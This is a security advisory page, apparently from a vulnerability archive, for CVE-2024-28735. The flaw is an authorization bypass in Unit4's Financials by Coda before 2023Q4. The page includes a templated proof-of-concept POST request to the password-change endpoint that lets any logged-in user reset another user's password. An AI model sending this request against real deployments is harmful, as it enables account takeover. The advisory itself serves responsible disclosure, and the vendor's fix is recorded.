Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Financials By Coda Authorization Bypass[6]
- Authored by Leo Draghi[7]
-
Financials by Coda versions prior to 2023Q4 suffer from an incorrect access control authorization bypass vulnerability. The Change Password feature can be abused in order to modify the password of any user of the application.
- advisories | CVE-2024-28735[8]
- SHA-256 |
b902e8c8533e18988a3d9cf1a301f95fdca312dbda532a060668f36b710b0b68
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Vulnerability type: Incorrect Access Control
# Vendor: https://www.unit4.com/
# Product: Financials by Coda
# Product site: https://www.unit4.com/fr/products/financial-management-software
# Affected version: < 2023Q4
# Fixed version: 2023Q4
# Credit: Léo DRAGHI
# CVE: CVE-2024-28735
# PROOF OF CONCEPT
The "Change Password" feature can be abused in order to modify the password of any user of the application.
The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.
POST /coda/rest/session/password HTTP/2
Host: <target>
<snip>
{
"user" : "<targeted_user>",
"password" : "<attacker_user_password>",
"company" : "<company>",
"newPassword" : "<new_password_for_targeted_user",
"tzOffset" :240
}
# TIMELINE
– 30/10/2023: Vulnerability found
– 02/11/2023: Vendor informed
– 05/12/2023: Vendor fixed the issue
– 14/03/2024: Public disclosure
File Tags
- ActiveX[19] (933)
- Advisory[20] (84,493)
- Arbitrary[21] (16,601)
- BBS[22] (2,859)
- Bypass[23] (1,825)
- CGI[24] (1,032)
- Code Execution[25] (7,603)
- Conference[26] (687)
- Cracker[27] (844)
- CSRF[28] (3,370)
- DoS[29] (24,420)
- Encryption[30] (2,383)
- Exploit[31] (52,665)
- File Inclusion[32] (4,247)
- File Upload[33] (982)
- Firewall[34] (822)
- Info Disclosure[35] (2,835)
- Intrusion Detection[36] (905)
- Java[37] (3,117)
- JavaScript[38] (888)
- Kernel[39] (6,964)
- Local[40] (14,672)
- Magazine[41] (586)
- Overflow[42] (13,004)
- Perl[43] (1,430)
- PHP[44] (5,179)
- Proof of Concept[45] (2,364)
- Protocol[46] (3,688)
- Python[47] (1,596)
- Remote[48] (31,330)
- Root[49] (3,616)
- Rootkit[50] (520)
- Ruby[51] (617)
- Scanner[52] (1,648)
- Security Tool[53] (7,967)
- Shell[54] (3,240)
- Shellcode[55] (1,217)
- Sniffer[56] (899)
- Spoof[57] (2,256)
- SQL Injection[58] (16,500)
- TCP[59] (2,421)
- Trojan[60] (688)
- UDP[61] (896)
- Virus[62] (668)
- Vulnerability[63] (32,498)
- Web[64] (9,844)
- Whitepaper[65] (3,769)
- x86[66] (966)
- XSS[67] (18,134)
- Other[68]
File Archives
- March 2024[69]
- February 2024[70]
- January 2024[71]
- December 2023[72]
- November 2023[73]
- October 2023[74]
- September 2023[75]
- August 2023[76]
- July 2023[77]
- June 2023[78]
- May 2023[79]
- April 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,070)
- BSD[84] (376)
- CentOS[85] (57)
- Cisco[86] (1,927)
- Debian[87] (6,984)
- Fedora[88] (1,693)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,466)
- HPUX[91] (880)
- iOS[92] (371)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (48,898)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (488)
- RedHat[101] (15,276)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,367)
- UNIX[106] (9,375)
- UnixWare[107] (187)
- Windows[108] (6,639)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]